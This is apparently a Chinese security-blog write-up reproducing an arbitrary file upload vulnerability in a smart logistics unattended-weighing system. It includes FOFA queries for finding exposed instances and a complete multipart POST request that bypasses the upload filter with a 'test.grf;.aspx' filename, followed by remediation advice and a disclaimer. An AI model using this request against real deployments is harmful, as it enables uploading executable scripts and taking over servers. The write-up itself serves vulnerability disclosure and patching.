易思智能物流无人值守系统文件上传漏洞复现

简介

智能物流无人值守是针对流程生产企业原料采购、产成品销售及厂内物流的统一管控智能信息化平台。 目的:全企业产供销业务的集成管理,无人值守计量、降本增效、机器替代人工，优化物流资源管控体系。

该系统5.0版本/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞

漏洞复现

FOFA语法：

"智能物流无人值守系统"

或者

web.body="智能物流无人值守系统"

访问界面如下所示：

POC：/Sys_ReportFile/ImportReport?encode=test

其中test为上传后的文件名

拼接URL直接进行访问返回如下：

可能已经进行修复并且添加了访问控制

返回信息如下：

尝试构造POC进行利用

POST /Sys_ReportFile/ImportReport?encode=test HTTP/1.1

Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
 

------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
Content-Type: application/octet-stream

test123
------WebKitFormBoundaryxzUhGld6cusN3Alk--

拼接URL进行访问

文件上传成功

修复建议

关注和应用厂商发布的安全补丁和更新，修复已知的文件上传漏洞。

对上传文件的类型、大小、文件名等进行验证，确保只允许上传合法的文件类型，并限制文件大小和文件名的长度。

添加访问控制。

免责声明

文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！！！

---

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。